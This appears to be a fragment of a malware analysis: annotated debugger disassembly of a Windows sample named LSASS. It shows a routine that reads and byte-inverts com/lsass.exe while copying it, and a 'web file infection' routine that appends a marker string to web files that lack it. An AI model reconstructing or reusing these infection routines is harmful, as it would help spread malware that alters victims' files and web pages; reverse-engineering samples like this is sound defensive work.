004065A5 |> FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; |/stream
004065A8 |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; |/fclose
004065AE |. 8B86 78010000 MOV EAX,DWORD PTR DS:[ESI+178] ; |
004065B4 |. C70424 E8D14000 MOV DWORD PTR SS:[ESP],LSASS.0040D1E8 ; |ASCII "rb"
004065BB |. 50 PUSH EAX ; |path
004065BC |. FF15 84A34000 CALL DWORD PTR DS:[<&MSVCRT.fopen>] ; /fopen
004065C2 |. 59 POP ECX ; open com/lsass.exe
004065C3 |. 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX ; handle
004065C6 |. 85C0 TEST EAX,EAX
004065C8 |. 59 POP ECX
004065C9 |. 0F84 BD000000 JE LSASS.0040668C
004065CF |. 50 PUSH EAX
004065D0 |. C645 F3 01 MOV BYTE PTR SS:[EBP-D],1
004065D4 |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; read com/lsass.exe all
004065DA |. 6A 01 PUSH 1
004065DC |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170]
004065E2 |. FFD3 CALL EBX ; fread
004065E4 |. 83C4 10 ADD ESP,10
004065E7 |> 85C0 /TEST EAX,EAX
004065E9 |. 74 5E |JE SHORT LSASS.00406649
004065EB |. 807D F3 00 |CMP BYTE PTR SS:[EBP-D],0
004065EF |. 74 2F |JE SHORT LSASS.00406620
004065F1 |. 33C9 |XOR ECX,ECX
004065F3 |. 390D 3CD04000 |CMP DWORD PTR DS:[40D03C],ECX
004065F9 |. 894D EC |MOV DWORD PTR SS:[EBP-14],ECX
004065FC |. 76 1E |JBE SHORT LSASS.0040661C
004065FE |> 8B96 70010000 |/MOV EDX,DWORD PTR DS:[ESI+170]
00406604 |. 03CA ||ADD ECX,EDX
00406606 |. 8A11 ||MOV DL,BYTE PTR DS:[ECX]
00406608 |. F6D2 ||NOT DL
0040660A |. 8811 ||MOV BYTE PTR DS:[ECX],DL
0040660C |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14]
0040660F |. 41 ||INC ECX
00406610 |. 41 ||INC ECX
00406611 |. 3B0D 3CD04000 ||CMP ECX,DWORD PTR DS:[40D03C]
00406617 |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX
0040661A |.^ 72 E2 |/JB SHORT LSASS.004065FE
0040661C |> 8065 F3 00 |AND BYTE PTR SS:[EBP-D],0
00406620 |> FF75 E0 |PUSH DWORD PTR SS:[EBP-20]
00406623 |. 50 |PUSH EAX
00406624 |. 6A 01 |PUSH 1
00406626 |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]
0040662C |. FFD7 |CALL EDI ; fwrite
0040662E |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C]
00406631 |. 0145 E8 |ADD DWORD PTR SS:[EBP-18],EAX
00406634 |. FF35 3CD04000 |PUSH DWORD PTR DS:[40D03C]
0040663A |. 6A 01 |PUSH 1
0040663C |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]
00406642 |. FFD3 |CALL EBX ; fread, read next
00406644 |. 83C4 20 |ADD ESP,20
00406647 |.^ EB 9E /JMP SHORT LSASS.004065E7
00406649 |> FF75 E0 PUSH DWORD PTR SS:[EBP-20]
0040664C |. 8B0D 3CD04000 MOV ECX,DWORD PTR DS:[40D03C]
00406652 |. 8D46 64 LEA EAX,DWORD PTR DS:[ESI+64]
00406655 |. 6A 04 PUSH 4
00406657 |. 6A 01 PUSH 1
00406659 |. 50 PUSH EAX
0040665A |. 8908 MOV DWORD PTR DS:[EAX],ECX
0040665C |. FFD7 CALL EDI
0040665E |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; /stream
00406661 |. 8B3D 90A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fclose>] ; |msvcrt.fclose
00406667 |. FFD7 CALL EDI ; /fclose
00406669 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20]
0040666C |. FFD7 CALL EDI
0040666E |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block
00406674 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free
0040667A |. 83C4 1C ADD ESP,1C
0040667D |. FF05 04F44000 INC DWORD PTR DS:[40F404]
00406683 |. C686 B3010000 01 MOV BYTE PTR DS:[ESI+1B3],1
0040668A |. EB 0D JMP SHORT LSASS.00406699
0040668C |> FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block
00406692 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free
00406698 |. 59 POP ECX
00406699 |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
0040669D |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]
004066A0 |. E8 571E0000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004066A5 |. 32C0 XOR AL,AL
004066A7 |> 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
004066AA |. 5F POP EDI
004066AB |. 5E POP ESI
004066AC |. 64:890D 00000000 MOV DWORD PTR FS:[0],ECX
004066B3 |. 5B POP EBX
004066B4 |. C9 LEAVE
004066B5 /. C3 RETN
3 web文件感染函数
00402B97 /$ B8 41904000 MOV EAX,LSASS.00409041 ; web file infect function
00402B9C |. E8 5F5B0000 CALL <JMP.&MSVCRT._EH_prolog>
00402BA1 |. 81EC 60040000 SUB ESP,460
00402BA7 |. 53 PUSH EBX
00402BA8 |. 56 PUSH ESI
00402BA9 |. 8BF1 MOV ESI,ECX
00402BAB |. 6A 01 PUSH 1
00402BAD |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00402BB0 |. 5B POP EBX
00402BB1 |. 895D FC MOV DWORD PTR SS:[EBP-4],EBX
00402BB4 |. E8 4F590000 CALL <JMP.&MFC42.#540_??0CString@@QAE@X>
00402BB9 |. A1 18A34000 MOV EAX,DWORD PTR DS:[<&MSVCIRT.?openpr>
00402BBE |. 53 PUSH EBX
00402BBF |. 8D4D 94 LEA ECX,DWORD PTR SS:[EBP-6C]
00402BC2 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2
00402BC6 |. FF30 PUSH DWORD PTR DS:[EAX]
00402BC8 |. 53 PUSH EBX
00402BC9 |. FF75 08 PUSH DWORD PTR SS:[EBP+8]
00402BCC |. FF15 14A34000 CALL DWORD PTR DS:[<&MSVCIRT.??0ifstrea>; MSVCIRT.??0ifstream@@QAE@PBDHH@Z
00402BD2 |. 8D45 94 LEA EAX,DWORD PTR SS:[EBP-6C]
00402BD5 |. C645 FC 03 MOV BYTE PTR SS:[EBP-4],3
00402BD9 |. 85C0 TEST EAX,EAX
00402BDB |. 74 0A JE SHORT LSASS.00402BE7
00402BDD |. 8B45 94 MOV EAX,DWORD PTR SS:[EBP-6C]
00402BE0 |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]
00402BE3 |. 8D4405 94 LEA EAX,DWORD PTR SS:[EBP+EAX-6C]
00402BE7 |> F640 08 06 TEST BYTE PTR DS:[EAX+8],6
00402BEB |. 0F85 A4000000 JNZ LSASS.00402C95
00402BF1 |. 85C0 TEST EAX,EAX
00402BF3 |. 0F84 9C000000 JE LSASS.00402C95
00402BF9 |. 68 10F44000 PUSH LSASS.0040F410
00402BFE |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00402C01 |. E8 165A0000 CALL <JMP.&MFC42.#860_??4CString@@QAEAB>
00402C06 |> 8B45 94 /MOV EAX,DWORD PTR SS:[EBP-6C]
00402C09 |. 8B40 04 |MOV EAX,DWORD PTR DS:[EAX+4]
00402C0C |. 845C05 9C |TEST BYTE PTR SS:[EBP+EAX-64],BL
00402C10 |. 75 28 |JNZ SHORT LSASS.00402C3A
00402C12 |. 6A 0A |PUSH 0A
00402C14 |. 8D85 94FBFFFF |LEA EAX,DWORD PTR SS:[EBP-46C]
00402C1A |. 68 00040000 |PUSH 400
00402C1F |. 50 |PUSH EAX
00402C20 |. 8D4D 94 |LEA ECX,DWORD PTR SS:[EBP-6C]
00402C23 |. FF15 10A34000 |CALL DWORD PTR DS:[<&MSVCIRT.?getline@>; MSVCIRT.?getline@istream@@QAEAAV1@PAEHD@Z
00402C29 |. 8D85 94FBFFFF |LEA EAX,DWORD PTR SS:[EBP-46C]
00402C2F |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402C32 |. 50 |PUSH EAX
00402C33 |. E8 0E5A0000 |CALL <JMP.&MFC42.#941_??YCString@@QAEA>
00402C38 |.^ EB CC /JMP SHORT LSASS.00402C06
00402C3A |> 8D4D 94 LEA ECX,DWORD PTR SS:[EBP-6C]
00402C3D |. FF15 0CA34000 CALL DWORD PTR DS:[<&MSVCIRT.?close@ifs>; MSVCIRT.?close@ofstream@@QAEXXZ
00402C43 |. FF75 0C PUSH DWORD PTR SS:[EBP+C]
00402C46 |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00402C49 |. E8 C2590000 CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
00402C4E |. 83F8 FF CMP EAX,-1
00402C51 |. 75 42 JNZ SHORT LSASS.00402C95
00402C53 |. 8B86 B8010000 MOV EAX,DWORD PTR DS:[ESI+1B8]
00402C59 |. 81C6 B8010000 ADD ESI,1B8
00402C5F |. 6A 00 PUSH 0
00402C61 |. 53 PUSH EBX
00402C62 |. FF75 08 PUSH DWORD PTR SS:[EBP+8]
00402C65 |. 8BCE MOV ECX,ESI
00402C67 |. FF50 28 CALL DWORD PTR DS:[EAX+28] ; openfile
00402C6A |. 85C0 TEST EAX,EAX
00402C6C |. 74 27 JE SHORT LSASS.00402C95
00402C6E |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
00402C70 |. 6A 02 PUSH 2
00402C72 |. 6A 00 PUSH 0
00402C74 |. 8BCE MOV ECX,ESI
00402C76 |. FF50 30 CALL DWORD PTR DS:[EAX+30] ; seekfile
00402C79 |. 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C]
00402C7C |. 8B16 MOV EDX,DWORD PTR DS:[ESI]
00402C7E |. 8B48 F8 MOV ECX,DWORD PTR DS:[EAX-8]
00402C81 |. 51 PUSH ECX
00402C82 |. 50 PUSH EAX
00402C83 |. 8BCE MOV ECX,ESI
00402C85 |. FF52 40 CALL DWORD PTR DS:[EDX+40] ; writefile
00402C88 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
00402C8A |. 8BCE MOV ECX,ESI
00402C8C |. FF50 54 CALL DWORD PTR DS:[EAX+54] ; close
00402C8F |. FF05 08F44000 INC DWORD PTR DS:[40F408]
00402C95 |> 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]
00402C98 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2
00402C9C |. FF15 08A34000 CALL DWORD PTR DS:[<&MSVCIRT.??1ifstrea>; MSVCIRT.??1ifstream@@UAE@XZ
00402CA2 |. 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]
00402CA5 |. FF15 04A34000 CALL DWORD PTR DS:[<&MSVCIRT.??1ios@@UA>; MSVCIRT.??1ios@@UAE@XZ
00402CAB |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00402CAE |. 885D FC MOV BYTE PTR SS:[EBP-4],BL
00402CB1 |. E8 46580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X>
00402CB6 |. 8065 FC 00 AND BYTE PTR SS:[EBP-4],0
00402CBA |. 8D4D 08 LEA ECX,DWORD PTR SS:[EBP+8]
00402CBD |. E8 3A580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X>
00402CC2 |. 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
00402CC6 |. 8D4D 0C LEA ECX,DWORD PTR SS:[EBP+C]
00402CC9 |. E8 2E580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X>
00402CCE |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
00402CD1 |. 5E POP ESI
00402CD2 |. 5B POP EBX
00402CD3 |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX
00402CDA |. C9 LEAVE
00402CDB /. C2 0800 RETN 8